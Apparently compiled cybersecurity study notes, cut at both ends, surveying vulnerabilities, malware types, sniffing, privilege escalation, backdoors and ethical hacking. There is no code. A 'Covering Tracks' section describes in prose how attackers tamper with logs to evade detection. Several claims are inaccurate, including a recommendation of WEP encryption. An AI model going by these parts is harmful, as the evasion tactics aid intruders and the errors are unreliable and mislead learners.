amusement or to showcase their knowledge and abilities.

Types of Crackers
There are various types of crackers that include script kiddies, packet monkeys, s’kiddiots,
lamers, warez d00dz (dudes), and wannabes. Usually, they are less skilled and do not possess the
necessary in-depth knowledge about programming and codes. They almost always rely on the
software tools created by others to carry out their operations. Most of the times, they do not
know what this program really does. They only know the process of cracking the security
networks, and they lack advanced knowledge. They are not much of a threat, but their threats
cannot be ignored. They basically deface the web pages and replace them with their designs.

Hackers vs Crackers
There is a common view that hackers build things, and crackers break things. These are
basically two entirely different terms. They may seem similar, but there are differences between
how the two actually work. While hackers who have advanced knowledge of computer-related
security, crackers usually are not as skilful as hackers. Very few of them are skilled enough to
create their new software and tools. So they generally rely on certain not so reputed, in fact, the
disrepute websites to download several automated programs to execute their deed. Hackers try to
counter the potential threats that the crackers pose to the computer and internet security across
varied networks. Crackers always know that their activities are illegal and they are breaking the
law, so they tend to cover up their tracks.

However, the professional hackers being competent enough and quite skilful with their work,
potentially restore the security setups across the corrupted networks, and they help in catching
the specific crackers. Although most of the crackers are less skilled yet many of them are able
enough. They possess advanced skills and extensive knowledge, just like professional hackers.
They have the ability to create tools and software that help them exploit all sorts of weak points
that they discover in the highly secured programs. This makes it even difficult to catch these
crackers. Because they do not leave a trail behind, the number of skilled crackers is very low, yet
we should not ignore them. They certainly pose a serious threat to internet security.

By now, we are well aware that the hackers are the ethical professionals while the crackers break
into the security systems unethically and illegally. Besides this ethical difference, one of the
major differences between the two is their understanding of computer systems and security
systems. Their ability and inability to create programs and software tools is a major difference
between the two. The hackers can write codes in multiple languages. They have the upper hand
when it comes to the knowledge of various computer languages like C, C++, HTML, Java etc.
also; they have a complete understanding of what these codes do and how these software work.
Crackers, on the other hand, are inept when t comes to computer programs. They boast about
their abilities to break into the security systems and use them to their advantage. The difference
here is clear. The crackers break into secure networks for malicious purposes while a
professional hacker does not. So, therefore, it is just how they work, which makes them entirely
different from each other.

Cybersecurity Vulnerabilities: Types, Examples, and more

The importance of cybersecurity in sustaining business operations has increased significantly as
the value of data increases every day. Organizations must successfully prevent employee and
customer data breaches if they want to develop new business connections and sustain long-term
relationships. A thorough awareness of cybersecurity vulnerabilities and the techniques used by
threat actors to access networks is necessary to achieve this level of security.

Effective vulnerability management not only improves security programmes but also lessens the
impact of successful attacks. For enterprises across industries, having a well-established
vulnerability management system is now a must. The most typical categories of cybersecurity
vulnerabilities are described below, along with methods to manage vulnerabilities on your
systems.
 What is Cyber Security Vulnerabilities?

Any flaw in an organization’s internal controls, system procedures, or information systems is a

vulnerability in cyber security. Cybercriminals and Hackers may target these vulnerabilities and
exploit them through the points of vulnerability.

These hackers can enter the networks without authorization and seriously harm data privacy.
Data being a gold mine in this modern world is something that has to be secured preciously. As a
result, it is crucial to constantly check for cybersecurity vulnerabilities because flaws in a
network could lead to a complete compromise of an organization’s systems.

Examples of Cyber Security Vulnerabilities

Here are a few examples of cybersecurity vulnerabilities

• Missing data encryption

• Lack of security cameras
• Unlocked doors at businesses
• Unrestricted upload of dangerous files
• Code downloads without integrity checks
• Using broken algorithms
• URL Redirection to untrustworthy websites
• Weak and unchanged passwords
• Website without SSL
Vulnerability Vs. Cyber Security Attacks

A system has vulnerabilities from the start; they are not introduced. It is a fault or weakness in
infrastructure similar to the construction. Few instances of cybercrime result in vulnerabilities,
and they frequently come from network or operating system configuration errors. On the other
hand, various types of cyber security attacks enter a system through social engineering attacks or
malware downloads.

In reality, risks are the likelihood and consequences of a vulnerability being used against you.
The risk is low if these two factors are low. Since they are directly inversely correlated, the high
probability and impact of vulnerabilities result in high risks.

Cyber Security Vulnerability Becoming Exploitable

An exploitable vulnerability has at least one specific attack vector. For obvious reasons, attackers
seek out vulnerable points in the system or network. Of course, nobody wants to have a
weakness but could exploit it should concern you more.

There are instances where a vulnerability is not exploitable. The causes can be:

1. Insufficient public knowledge for attackers to exploit.

2. The attacker might not have had access to the local system or prior authentication.
3. Current security measures
Causes of Cyber Security Vulnerabilities

There are many causes of cyber security vulnerabilities. A few of them are as follows:
 • Complexity: The likelihood of errors, defects, or unauthorized access increases with
complex systems.
• Familiarity: Attackers may already be acquainted with common code, operating systems,
hardware, and software that result in well-known vulnerabilities.
• Connectivity: Vulnerabilities are more likely to exist in connected devices. It is better to
avoid connecting to multiple devices unnecessarily.
• Poor Password Management: This can cause several data breaches because of weak or
repeated passwords. It is important to change passwords using strong password generators
regularly.
• Internet: Spyware and adware that can be loaded on computers automatically are abundant
on the internet.
• Operating System Flaws: Operating systems can also be flawed. Operating systems that
aren’t safe by default might provide users unrestricted access and serve as a haven for
malware and viruses.
• Software Bugs: Sometimes, programmers may unintentionally introduce a vulnerability that
can exploit.
• Unchecked User Input: If software or a website presumes that all user input is secure, SQL
injection may be executed without the user’s knowledge.
• People: For most organizations, social engineering poses the biggest concern. Therefore, one
of the main sources of vulnerability can be people.
Types of Cyber Security Vulnerabilities

Here are a few common types of cybersecurity vulnerabilities:

System Misconfigurations

Network assets can cause system mistakes with incompatible security settings or restrictions.
Networks are frequently searched for system errors and vulnerable spots by cybercriminals.
Network misconfigurations are increasing as a result of the quick digital revolution. Working
with knowledgeable security professionals is crucial when implementing new technology.
Cybercriminals frequently search networks for vulnerabilities and misconfigurations in the
system that they can exploit.

Out-of-date or Unpatched Software

Hackers frequently scour networks for vulnerable, unpatched systems that are prime targets, just
as system configuration errors do. Attackers may use these unpatched vulnerabilities to steal
confidential data, which is a huge threat to any organization. Establishing a patch management
strategy that ensures all the most recent system updates are applied as soon as they are issued is
crucial for reducing these types of threats.

Missing or Weak Authorization Credentials

Attackers frequently utilize brute force methods, such as guessing employee passwords, to gain
access to systems and networks. Therefore, they must therefore train employees on cybersecurity
best practices to prevent the easy exploitation of their login credentials. An endpoint system
security will be a great addition to all laptop or desktop devices.
 Malicious Insider Threats

Employees with access to vital systems may occasionally share data that enables hackers to
infiltrate the network, knowingly or unknowingly. Because all acts seem genuine, insider threats
can be challenging to identify. Consider purchasing network access control tools and segmenting
your network according to employee seniority and experience to counter these risks.

Missing or Poor Data Encryption

If a network has weak or nonexistent encryption, it will be simpler for attackers to intercept
system communications and compromise them. Cyber adversaries can harvest crucial
information and introduce misleading information onto a server when there is weak or
unencrypted data. This may result in regulatory body fines and adversely jeopardize an
organization’s efforts to comply with cyber security regulations.

Zero-day Vulnerabilities

Zero-day vulnerabilities are specific software flaws that the attackers are aware of but that a
company or user has not yet identified.

Since the vulnerability has not yet been identified or reported by the system manufacturer, there
are no known remedies or workarounds in these situations. These are particularly risky because
there is no protection against them before an attack occurs. Exercising caution and checking
systems for vulnerabilities is crucial to reducing the risk of zero-day attacks.

Cyber Security Course Fees

Vulnerability Management

The process of identifying, classifying, resolving, and mitigating security vulnerabilities is

known as vulnerability management. Vulnerability management consists of three key
components:

1. Vulnerability detection
2. Vulnerability assessment
3. Addressing Vulnerabilities
Vulnerability Detection

The process of vulnerability detection has the following three methods:

• Vulnerability scanning
• Penetration testing
• Google hacking
Cyber Security Vulnerability Scan

The Cyber Security Vulnerability Scan is performed to discover computer, program, or network
vulnerabilities. A scanner (software) is used to find and pinpoint network vulnerabilities
resulting from improper configuration and poor programming.
SolarWinds Network Configuration Manager (NCM), ManageEngine Vulnerability Manager
Plus, Rapid7 Nexpose, TripWire IP 360, and others are some common vulnerability detection
solutions.

Penetration Testing

Testing an IT asset for security flaws that an attacker might be able to exploit is known as
penetration testing or pen testing. Manual or automated penetration testing is available.
Additionally, it can evaluate adherence to compliance standards, staff security knowledge,
security policies, and the capacity to recognize and address security events.

Google Hacking

Google hacking is using a search engine to identify security flaws. Google hacking is
accomplished by using complex search operators in queries that can find difficult information or
data that has unintentionally been made public due to cloud service misconfiguration. These
focused queries are typically used to find sensitive data not meant for public exposure.

Vulnerability Assessment

A cybersecurity vulnerability assessment is the next step after identifying vulnerabilities to

determine the danger they pose to your organization. Using vulnerability assessments, you can
prioritize remediation activities by assigning risk levels to detected threats. Effective assessments
support compliance efforts by ensuring that vulnerabilities are fixed before they can use them
against the organization.

Addressing Vulnerabilities

Once a vulnerability’s risk level has been determined, you then need to treat the vulnerability.
There are different ways in which you can treat a vulnerability. These include:

• Remediation
Remediation is a process where a vulnerability is completely fixed or patched as part of
vulnerability repair. Since it reduces risk, this is one of the most preferred methods of treating
vulnerabilities.

• Mitigation
To mitigate a vulnerability, one must take action to make it less likely to be exploited. Usually,
vulnerability mitigation is done to purchase time until a suitable patch is released.

• Acceptance
When an organization determines that a vulnerability carries a minimal risk, it is acceptable to
take no action to resolve it. Acceptance is also acceptable if fixing the vulnerability will cost
more than fixing it if it is exploited. Such a situation or process is called Acceptance.
 Malware
Malware is malicious software that enables the attacker to have full or limited control
over the target system. Malware can damage, modify, and/or steal information from
the system. There are various types of malware such as viruses, Trojans, worms,
rootkits, spyware, and ransomware. A malware might enter the system through
emails, file transfers, installation of random third-party software, and nonusage of
quality antivirus software.

What is a Malware Attack?

A malware attack is a cyberattack where malware performs or executes unauthorized
actions on a user’s system. Even criminal organizations, state actors, and well-known
businesses have been accused of or caught deploying malware. If the impact of a
malware attack is severe, it ends up being mainstream news just like other
cyberattacks.

Types of Malware
There are several types of malware. Let us take a look at them.

Malware Virus

It is malware that requires human intervention to run and disseminate. The following
are the different types of viruses:

• File Viruses: These viruses are infected executable files that infect other files
when opened.
• Macro Viruses: These viruses are Excel files that have malware written in VBS;
when such files are opened, a macro gets executed and infects other files.
• Master Boot Record Viruses: These viruses change or delete boot records that
can render a system useless.
 • Polymorphic Viruses: These viruses are able to evade detection by changing
their form frequently.
• Stealth Viruses: These viruses hide in other legitimate files or services.

To enhance your better understanding of Information System Security go through

this blog

Trojan Malware

Trojan is a malware that conceals itself in other legitimate files. When the files and
software that are bundled with malware get installed, the malware too gets installed
and executed. The following are the various types of Trojans:

• Remote Access Trojans: These Trojans allow hackers to gain remote access to
systems through covert channels without the knowledge of the user.
• Data Sending Trojans: These Trojans steal data from systems and transmit it to
the attacker.
• Destructive Trojans: As the name suggests, these Trojans destroy files and
services.
• Security Software Disabler Trojans: These Trojans can disable system
firewalls and antiviruses to prevent detection of other malicious files being
downloaded and executed.

Worm Malware

Worms are similar to viruses but without the need for human intervention to run and
propagate.

Rootkit Malware

Rootkits are extremely difficult to detect and just as impossible to remove unless the
system is formatted.
 Malware Examples
Malware has a long history that dates back to infected floppy disks swapped by Apple
II hobbyists in the 1980s and the Morris Worm that infected Unix machines in 1988.
Some other examples of high-profile malware attacks are:

• SQL Slammer that brought internet traffic to a halt within minutes of release in
2003
• Zeus, a keylogger Trojan that targeted banking information
• CryptoLocker’s code kept getting repurposed for malware projects of similar
caliber and was the first example of a widespread ransomware attack
• Stuxnet infected systems all over the world but only did real damage to the
uranium-enrichment centrifuges at Natanz, the Iranian nuclear facility

Malware Detection
The following is how you can detect malware-infected systems or networks. These are
the signs that you need to look for:

1. Extremely slow and unresponsive system

2. Undeletable files
3. Random folders or shortcuts inside folders
4. Issues while shutting down due to certain running files or programs
5. Change in default settings of PC
6. Unnecessary running services or programs using up the processing power of the
CPU
7. Reboot issues
8. Auto shutdown
9. Unnecessary traffic patterns or traffic to destinations you never targeted
10. Similar malware alerts by the antivirus on the network
 Sniffing
What Are Sniffing Attacks, and How Can They Be Prevented?
The technique of capturing all data packets traveling through a network using a software
application or hardware device is known as network sniffing (Mitchell, 2021). Ethical hackers
can use sniffing to gain tremendous insights into the workings of a network and the behavior of
its users, which can be used to improve an organization’s cybersecurity.
However, when employed by malicious hackers, sniffing can be used to launch devastating
attacks against unsuspecting targets. This article will look at what sniffing is, how it can be used
for harm, and how sniffing attacks can be prevented.
What Is Sniffing?
In its simplest form, sniffing is the act of intercepting and monitoring traffic on a network. This
can be done using software that captures all data packets passing through a given network
interface or by using hardware devices explicitly designed for this purpose.
What Are Sniffing Attacks?
A sniffing attack occurs when an attacker uses a packet sniffer to intercept and read sensitive
data passing through a network (Biasco, 2021). Common targets for these attacks include
unencrypted email messages, login credentials, and financial information.
In some cases, attackers may also use sniffing attack tools and packet sniffers to inject malicious
code into otherwise innocuous data packets in an attempt to hijack a target’s computer or other
devices.
How Do Hackers Intercept Packets?
There are several ways an attacker can capture packets passing through a network. One popular
method is to set up a packet sniffer on a computer connected to the network in question. This
computer acts as a proxy between the targeted devices and the rest of the world, allowing the
attacker to capture all traffic passing through.
Another common technique is ARP poisoning, in which the attacker tricks devices on the
network into thinking they are communicating with another device when they are not
(Grimmick, 2021). This allows the attacker to intercept and read all traffic passing between the
two “devices.”
Types of Sniffing Attacks
There are two primary sniffing attack types: passive and active.
Passive Sniffing
In a passive sniffing attack, the hacker monitors traffic passing through a network without
interfering in any way. This type of attack can be beneficial for gathering information about
targets on a network and the types of data (e.g., login credentials, email messages) they are
transmitting. Because it does not involve any interference with the target systems, it is also less
likely to raise suspicion than other types of attacks.
Active Sniffing
Active sniffing is a type of attack that involves sending crafted packets to one or more targets on
a network to extract sensitive data. By using specially crafted packets, attackers can often bypass
security measures that would otherwise protect data from being intercepted. Active sniffing can
also involve injecting malicious code into target systems that allows attackers to take control of
them or steal sensitive information.
 Consequences of a Sniffing Attack
A successful sniffing attack can have several severe consequences for the targets. These can
include:
• Loss of sensitive data, such as login credentials, financial information, and email messages
• Injection of malicious code into target systems, allowing attackers to control devices or access sensitive
information
• Interruption of network traffic, which can cause communication problems and slow down network performance
• Exposure of confidential information, such as trade secrets and proprietary data
• Damage to the reputation of the organization whose network has been compromised
How Can Sniffing Attacks Be Prevented?
There are many ways to protect your network against sniffing attacks. Some key measures
include:
• Using encryption to protect sensitive data from being intercepted
• Never sending sensitive information over an unencrypted connection
• Ensuring that all computers on a network are adequately protected with antivirus and firewall software
• Making sure the wireless network is secured using WPA or WEP encryption
• Regularly updating all software and devices with the latest security patches
• Staying aware of what type of traffic passes through the network and taking steps to protect sensitive
information
• Using a VPN when connecting to public Wi-Fi networks
• Continuously monitoring the network for unusual activity
 Hackers and Cyber Crimes_part 2

Gaining Access
Gaining access attack is the second part of the network penetration testing. In this
section, we will connect to the network. This will allow us to launch more powerful
attacks and get more accurate information. If a network doesn't use encryption, we can
just connect to it and sniff out unencrypted data. If a network is wired, we can use a
cable and connect to it, perhaps through changing our MAC address. The only
problem is when the target use encryption like WEP, WPA, WPA2. If we do
encounter encrypted data, we need to know the key to decrypt it, that's the main
purpose of this chapter.

If the network uses encryption, we can't get anywhere unless we decrypt it. In this
section, we will discuss that how to break that encryption and how to gain access to
the networks whether they use WEP/WPA/WPA2.

What is a Privilege Escalation Attack?

A privilege escalation attack is a cyberattack to gain illicit access

of elevated rights, permissions, entitlements, or privileges beyond
what is assigned for an identity, account, user, or machine. This
attack can involve an external threat actor or an insider threat.
Privilege escalation is a key stage of the cyberattack chain and
typically involves the exploitation of a privilege escalation
vulnerability, such as a system bug, misconfiguration, or inadequate
access controls.
In this blog, I will explain how privilege escalation works, the key
attack vectors involved with privilege escalation, and the critical
privileged access security controls you can implement to prevent or
mitigate it.
How does Privilege Escalation Work?

Every local interactive session or remote access session represents

some form of privileged access, regardless if executed by a human
or a machine. This encompasses everything from guest privileges
allowing local logon only, to administrator or root privileges for a
remote session and potentially complete system control. Therefore,
every account that interacts with a system has some privileges
assigned.
A standard user account rarely has rights to a database, sensitive
files, or anything of value. So, how does a threat actor navigate an
environment and gain administrator or root privileges to exploit
them as an attack vector? There are five primary methods:
1. Credential exploitation
2. Vulnerabilities and exploits
3. Misconfigurations
4. Malware
5. Social engineering
The attack chain diagram below shows the primary techniques used
by a threat actor, regardless of whether an insider or external threat,
to begin their mission and propagate through an environment.

Executing Applications in cyber security

Top 10 Important Applications of CyberSecurity

Cybersecurity threats change over time, and it is important for organizations to

counter these threats. Intruders adjust by creating new tools and tactics to
undermine security when new protections are developed to counter more recent
attacks. Your organization's cybersecurity is only as strong as its weakest link. To
safeguard your data and systems, it's crucial to have a collection of cybersecurity
tools and techniques at your disposal. Below are a few important applications of
cybersecurity -

1. Network Security Surveillance

Continuous network monitoring is the practice of looking for indications of harmful

or intrusive behavior. It is often used in conjunction with other security tools like
firewalls, antivirus software, and IDPs. Monitoring for network security may be
done manually or automatically using the software.
 2. Identification And Access Control (IAM)

The management has control over which individual can access which sections of the
data. Usually, the management regulates who has access to data, networks, and
computer systems. Here is where cybersecurity comes into the picture by
identifying users and executing an access control. Various cyber security
applications ensure IAM across an organization. IAM may be implemented in both
software and hardware, and it often makes use of role-based access control (RBAC)
to limit access to certain system components.

Managers can manage who has access to what, when they can access it, and for how
long, thanks to solution providers like Okta.

3. Software Security

Applications that are crucial to company operations are protected by application

security. It contains controls like code signing and application whitelisting and may
assist unify your security rules with things like file-sharing rights and multi-factor
authentication. With the application of AI in cyber security, software security is
bound to increase.

4. Risk Management

Risk management, data integrity, security awareness training, and risk analysis are
all covered by cyber security. The evaluation of risks and the control of the harm
that may be done as a result of these risks are important components of risk
management. The security of sensitive information is another issue covered by
data security.

5. Planning for disaster recovery and business continuity

Data recovery enables organizations to continue working in the event of data loss,
assaults, or calamities. By regularly data backup and spending money on a system
that will enable corporate activities to continue, this application offers models or
techniques that may help firms manage with severe data loss. Thus, this application
of cybersecurity ensures business continuity.

6. Physical Security

System locks, intrusion detection systems, alarms, surveillance systems, and data-
destruction systems are a few examples of physical security measures. These allow
organizations to secure their IT infrastructure.

7. Compliance And Investigations

Cybersecurity is helpful during the examination of suspicious situations.

Additionally, it helps to upkeep and adhere to regulations.

8. Security During Software Development

The software aids in detecting software flaws when they are being developed and
ensuring that regulations and standards are followed. Cybersecurity tools
thoroughly test, scan, and analyze the software to identify any bugs, openings, or
weaknesses that hackers or competing businesses might exploit.

9. Security Against DDoS

Cybersecurity aids in providing a mitigation solution to deal with DDoS. It redirects

traffic to other cloud-based servers and resolves the issue.

10. Protecting Critical Systems

Cybersecurity aids in preventing assaults on huge servers linked to wide-area

networks. It upholds industry-standard, strict safety standards for users to abide by
cybersecurity precautions to secure the devices. It keeps track of all apps in real
time and routinely evaluates the network security, servers, and users themselves.
 Covering Tracks
Covering Tracks we’ve got how an attacker hides malicious files on a target computer using
various stenographic techniques, NTFS streams, among others, to keep up future access to the
target. Now that the attacker has succeeded in performing this malicious operation, following
step are to get rid of any resultant traces/tracks within the system, Covering tracks is one in all
the most stage during system hacking. during this stage, the attacker tries to cover and avoid
being detected, or “traced out,” by covering all “tracks,” or logs, generated while gaining access
to the target network or computer. let’s see how the attacker removes traces of an attack within
the target computer.
Erasing evidence may be a requirement for an attacker who would love to stay obscure. this can
be one method to evade a traceback. This starts with erasing the contaminated logs and possible
error messages generated within the attack process. Then, attackers make changes within the
system configuration in order that it does riot log future activities, By manipulating and tweaking
the event logs, attackers trick the supervisor in believing that there’s no malicious activity within
the system, which no intrusion or compromise has actually taken place.
Because the primary thing a supervisor does in monitoring unusual activity is to see the system
log files, it’s common for intruders to use a utility to change these logs. in some cases, rootkits
can disable and discard all existing rugs. Attackers remove only those portions of logs that may
reveal their presence if they shall use the system for an extended period as a launch base for the
longer term exploitation.
It is imperative for attackers to form the system appear because it did before access was gained
and a backdoor established. this enables them to vary any file attributes back to their original
state. Information listed, like file size and date, simply attributes information contained within
the file.
Protecting against attackers trying to hide their tracks by changing file information is often
difficult. However, it’s possible to detect whether an attacker has done so by calculating the
filters cryptographic hash, this sort of hash could be a calculation of the whole file before
encryption.
Attackers might not wish to delete a whole log to hide their tracks, as doing so may require
admin privileges. If attackers are ready to delete only attack event logs, they’ll still be able to
escape detection.
Computer worm
What is a computer worm?
A computer worm is a type of malware whose primary function is to self-
replicate and infect other computers while remaining active on infected
systems.

A computer worm duplicates itself to spread to uninfected computers. It often

does this by exploiting parts of an operating system that are automatic and
invisible to the user.
Typically, a user only notices a worm when its uncontrolled replication
consumes system resources and slows or halts other tasks. A computer worm
is not to be confused with WORM, or write once, read many.

How do computer worms work?

Computer worms often rely on vulnerabilities in networking protocols, such
as File Transfer Protocol, to propagate.

After a computer worm loads and begins running on a newly infected system,
it will typically follow its prime directive: to remain active on an infected
system for as long as possible and spread to as many other vulnerable
systems as possible.

Is a worm a virus?
No. A worm is not a virus, although like a virus, it can severely disrupt IT operations and cause
data loss. A worm is actually much more serious than a virus because once it infects a vulnerable
machine, it can “self-replicate” and spread automatically across multiple devices.

How do worms infect computers?

Software vulnerabilities provide a path for worms to infect machines. Spam email or instant
message (IM) attachments are also a delivery method. The messages use social engineering to
get users to think the malicious files are safe to open. Removable drives, like USB drives, can
also deliver worms.

How do worms spread?

Worms self-replicate automatically. They spread by using automatic file sending and receiving
features that have been enabled, intentionally or not, on network computers. Once a worm has
infected a computer, it installs itself in the device’s memory and can then transfer itself to other
machines.
The 3 stages of a worm attack
Step 1: Enabling vulnerability
The initial phase of a worm attack occurs when the worm is first installed on a vulnerable
machine. The worm may have been transmitted through a software vulnerability. Or, it may have
arrived through a malicious email or IM attachment or a compromised removable drive.
Step 2: Automatic replication
Once a worm is installed on a vulnerable device or system, it begins to self-replicate
automatically. Through propagation, the worm makes its way to other new targets in the
network—consuming bandwidth and hard-drive space and undermining device and system
performance as it spreads.
Step 3: Payload delivery
In the last stage of a worm attack, the malicious actor behind the campaign tries to increase their
level of access to the targeted system. Over time, they could gain access rights equivalent to
those of a system administrator. From there, the adversary can cause significant damage,
including data theft, and potentially gain access to multiple systems.

What is a Trojan Horse? (Trojan Malware)

A Trojan Horse (Trojan) is a type of malware that disguises itself as legitimate code or
software. Once inside the network, attackers are able to carry out any action that a
legitimate user could perform, such as exporting files, modifying data, deleting files or
otherwise altering the contents of the device. Trojans may be packaged in downloads for
games, tools, apps or even software patches. Many Trojan attacks also leverage social
engineering tactics, as well as spoofing and phishing, to prompt the desired action in the
user.

Trojan: Virus or Malware?

A Trojan is sometimes called a Trojan virus or Trojan horse virus, but those terms are
technically incorrect. Unlike a virus or worm, Trojan malware cannot replicate itself or self-
execute. It requires specific and deliberate action from the user.

Trojans are malware, and like most forms of malware, Trojans are designed to damage files,
redirect internet traffic, monitor the user’s activity, steal sensitive data or set up backdoor
access points to the system. Trojans may delete, block, modify, leak or copy data, which can
then be sold back to the user for ransom or on the dark web.

Viruses in cyber security

Definitions:
A computer program that can copy itself and infect a computer without permission or
knowledge of the user. A virus might corrupt or delete data on a computer, use e-mail programs
to spread itself to other computers, or even erase everything on a hard disk. See malicious code.
Computer Virus Definition
Chances are you’ve heard how important it is to keep viruses out, but what is a computer
virus exactly? A computer virus is a type of malicious software, or malware, that spreads
between computers and causes damage to data and software.

Computer viruses aim to disrupt systems, cause major operational issues, and result in data
loss and leakage. A key thing to know about computer viruses is that they are designed to
spread across programs and systems. Computer viruses typically attach to an executable host
file, which results in their viral codes executing when a file is opened. The code then spreads
from the document or software it is attached to via networks, drives, file-sharing programs,
or infected email attachments.

Common Signs of Computer Viruses

Chances are you’ve heard how important it is to keep viruses out, but what is a computer
virus exactly? A computer virus will more than likely have an adverse effect on the device it
resides on and may be discoverable through common signs of performance loss, including:
 Speed of System

A computer system running slower than usual is one of the most common signs that the
device has a virus. This includes the system itself running slowly, as well as applications and
internet speed suffering. If a computer does not have powerful applications or programs
installed and is running slowly, then it may be a sign it is infected with a virus.

Pop-up Windows

Unwanted pop-up windows appearing on a computer or in a web browser are a telltale sign
of a computer virus. Unwanted pop-ups are a sign of malware, viruses, or spyware affecting
a device.

Programs Self-executing

If computer programs unexpectedly close by themselves, then it is highly likely that the
software has been infected with some form of virus or malware. Another indicator of a virus
is when applications fail to load when selected from the Start menu or their desktop
icon. Every time that happens, your next step should be to perform a virus scan and remove
any files on programs that might not be safe to use.

Accounts Being Logged Out

Some viruses are designed to affect specific applications, which will either cause them to
crash or force the user to automatically log out of the service.

Crashing of the Device

System crashes and the computer itself unexpectedly closing down are common indicators of
a virus. Computer viruses cause computers to act in a variety of strange ways, which may
include opening files by themselves, displaying unusual error messages, or clicking keys at
random.

Mass Emails Being Sent from Your Email Account

Computer viruses are commonly spread via email. Hackers can use other people's email
accounts to spread malware and carry out wider cyberattacks. Therefore, if an email account
has sent emails in the outbox that a user did not send, then this could be a sign of a computer
virus.
 Changes to Your Homepage

Any unexpected changes to a computer—such as your system’s homepage being amended or

any browser settings being updated—are signs that a computer virus may be present on the
device.

What is a Backdoor Attack?

In cybersecurity, a backdoor is a means of bypassing an organization’s existing security
systems. While a company may have various security solutions in place, there may be
mechanisms in place that allow a legitimate user or attacker to evade them. If an attacker can
identify and access these backdoors, they can gain access to corporate systems without
detection.

How Does a Backdoor Work?

Every computer system has an official means by which users are supposed to
access it. Often, this includes an authentication system where the user
provides a password or other type of credential to demonstrate their identity.
If the user successfully authenticates, they are granted access to the system
with their permissions limited to those assigned to their particular account.

While this authentication system provides security, it can also be

inconvenient for some users, both legitimate and illegitimate. A system
administrator may need to gain remote access to a system that is not designed
to allow it. An attacker may want to access a company’s database server
despite lacking the credentials to do so. The manufacturer of a system may
include a default account to simplify configuration, testing, and deployment
of updates to a system.

In these cases, a backdoor may be inserted into a system. For example, a

system administrator may set up a web shell on a server. When they want to
access the server, they visit the appropriate site and can send commands
directly to the server without needing to authenticate or configure corporate
security policies to accept a secure remote access protocol like SSH.

How is a Backdoor Used by Hackers?

A backdoor provides access to a system that bypasses an organization’s

normal authentication mechanisms. Cybercriminals, who theoretically lack
access to legitimate accounts on an organization’s systems, can use it to
remotely access corporate systems. With this remote access, they can steal
 sensitive data, deploy ransomware, spyware, or other malware, and take other
malicious actions on the system.

Often, backdoors are used to provide an attacker with initial access to an

organization’s environment. If a system administrator or other legitimate user
has created a backdoor on the system, an attacker that discovers this backdoor
may use it for their own purposes. Alternatively, if an attacker identifies a
vulnerability that would allow them to deploy their own backdoor on a
system, then they can use the backdoor to expand their access and capabilities
on the system.

Types of Backdoors

Backdoors can come in various different forms. A few of the most common
types include:

• Trojans: Most backdoor malware is designed to slip past an organization’s

defenses, providing an attacker with a foothold on a company’s systems. For
this reason, they are commonly trojans, which pretend to be a benign or
desirable file while containing malicious functionality, such as supporting
remote access to an infected computer.

• Built-in Backdoors: Device manufacturers may include backdoors in the

form of default accounts, undocumented remote access systems, and similar
features. While these systems are typically only intended for the use of the
manufacturer, they are often designed to be impossible to disable and no
backdoor remains secret forever, exposing these security holes to attackers.

• Web Shells: A web shell is a web page designed to take user input and
execute it within the system terminal. These backdoors are commonly
installed by system and network administrators to make it easier to remotely
access and manage corporate systems.

• Supply Chain Exploits: Web applications and other software often

incorporate third-party libraries and code. An attacker may incorporate
backdoor code into a library in the hope that it will be used in corporate
applications, providing backdoor access to systems running the software.
 Ethical Hacking and Social Engineering
Definition
Ethical hacking involves an authorized attempt to gain unauthorized access to
a computer system, application, or data. Carrying out an ethical hack involves
duplicating strategies and actions of malicious attackers. This practice helps
to identify security vulnerabilities which can then be resolved before a
malicious attacker has the opportunity to exploit them.

What is an ethical hacker?

Also known as “white hats,” ethical hackers are security experts that perform
these security assessments. The proactive work they do helps to improve an
organization’s security posture. With prior approval from the organization or
owner of the IT asset, the mission of ethical hacking is opposite from
malicious hacking.

What are the key concepts of ethical

hacking?
Hacking experts follow four key protocol concepts:

1. Stay legal. Obtain proper approval before accessing and performing

a security assessment.
2. Define the scope. Determine the scope of the assessment so that the
ethical hacker’s work remains legal and within the organization’s
approved boundaries.
3. Report vulnerabilities. Notify the organization of all vulnerabilities
discovered during the assessment. Provide remediation advice for
resolving these vulnerabilities.
4. Respect data sensitivity. Depending on the data sensitivity, ethical
hackers may have to agree to a non-disclosure agreement, in addition to
other terms and conditions required by the assessed organization.
How are ethical hackers different than
malicious hackers?
Ethical hackers use their knowledge to secure and improve the technology of
organizations. They provide an essential service to these organizations by
looking for vulnerabilities that can lead to a security breach.
An ethical hacker reports the identified vulnerabilities to the organization.
Additionally, they provide remediation advice. In many cases, with the
organization’s consent, the ethical hacker performs a re-test to ensure the
vulnerabilities are fully resolved.
Malicious hackers intend to gain unauthorized access to a resource (the more
sensitive the better) for financial gain or personal recognition. Some
malicious hackers deface websites or crash backend servers for fun,
reputation damage, or to cause financial loss. The methods used and
vulnerabilities found remain unreported. They aren’t concerned with
improving the organizations security posture.

What are some limitations of ethical

hacking?
• Limited scope. Ethical hackers cannot progress beyond a defined
scope to make an attack successful. However, it’s not unreasonable to
discuss out of scope attack potential with the organization.
• Resource constraints. Malicious hackers don’t have time constraints
that ethical hackers often face. Computing power and budget are
additional constraints of ethical hackers.
• Restricted methods. Some organizations ask experts to avoid test
cases that lead the servers to crash (e.g., Denial of Service (DoS)
attacks).

Attack Vector

Definition
An attack vector is a pathway or method used by a hacker to illegally access a network or
computer in an attempt to exploit system vulnerabilities. Hackers use numerous attack
vectors to launch attacks that take advantage of system weaknesses, cause a data breach, or
steal login credentials. Such methods include sharing malware and viruses, malicious email
attachments and web links, pop-up windows, and instant messages that involve the attacker
duping an employee or individual user.

Many security vector attacks are financially motivated, with attackers stealing money from
people and organizations or data and personally identifiable information (PII) to then hold
the owner to ransom. The types of hackers that infiltrate a network are wide-ranging. They
could be disgruntled former employees, politically motivated organized groups, hacktivists,
professional hacking groups, or state-sponsored groups.

The Difference Between an Attack Vector and an Attack Surface

Cybersecurity attacks are launched using an attack vector. This could be through malware or
a phishing attack, which aims to steal user credentials and gain unauthorized access to
corporate data or resources. Social engineering is another way to launch an attack.

The attack surface is the total network area an attacker can use to launch cyber attack vectors
and extract data or gain access to an organization’s systems. Devices and people are part of
an organization’s attack surface because their vulnerabilities, such as weak passwords or
unpatched software, can be exploited by an attacker.

Information assurance

Information assurance (IA) is the practice of assuring information and managing risks related to
the use, processing, storage, and transmission of information. Information assurance includes
protection of the integrity, availability, authenticity, non-repudiation and confidentiality of user data. IA
encompasses both digital protections and physical techniques. These methods apply to data in
transit, both physical and electronic forms, as well as data at rest. IA is best thought of as a superset
